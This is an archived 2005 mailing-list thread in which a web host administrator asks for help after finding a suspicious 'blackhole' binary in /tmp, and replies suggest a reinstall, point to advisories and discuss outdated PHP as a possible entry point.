Blackhole

[Justin Zygmont]

You may not have to reinstall the whole system, /tmp is likely the only 
directory that was writable through an exploit.  What does the program do, 
is it a DDOS attack program?


On Mon, 11 Apr 2005, Chris Kenward wrote:

> Hi Mike
>
>> Perhaps this will help to identify the file:
>
>> http://www.packetstormsecurity.org/0209-exploits/free-apache.txt
>> http://mx.mcafee.com/virusInfo/default.asp?id=description&virus_k=100670
>
>> If your machine has been compromised, the best thing to do is to
>> format and re-install, taking care not to open the same secuity
>> hole that allowed the first compromise.
>
> Many thanks. The web server has more than 200 websites on it, which is going
> to make it exceedingly difficult to track which of those allowed the attack.
> The server has only recently been rebuilt, at the cost of lots of stress
> while our customers whinged about their sites not being there, and I'm
> pretty loathe to go through that all again.
>
> There is mention in the link above regarding directories called:
> /tmp/.blackhole.c
>
> There isn't a directory called .blackhole.c on the server - just the one
> executable binary in the /tmp folder. I can't find anything else on the
> server which looks as though someone has had root access to the machine but
> there again I'm no Linux expert so it could be staring me in the face.
>
> Is there an "easy" way to track how this person got into the server? I
> notice that the latest update for PHP from the RHN is 4.3.2 and I understand
> from searches I've done on the 'net that 4.3.10 or even the latest 4.3.11 is
> urgently advised due to "holes" in earlier versions. Not sure, however,
> whether this is how the person managed to drop that on the server.
>
> Regards
> Chris
>
>
>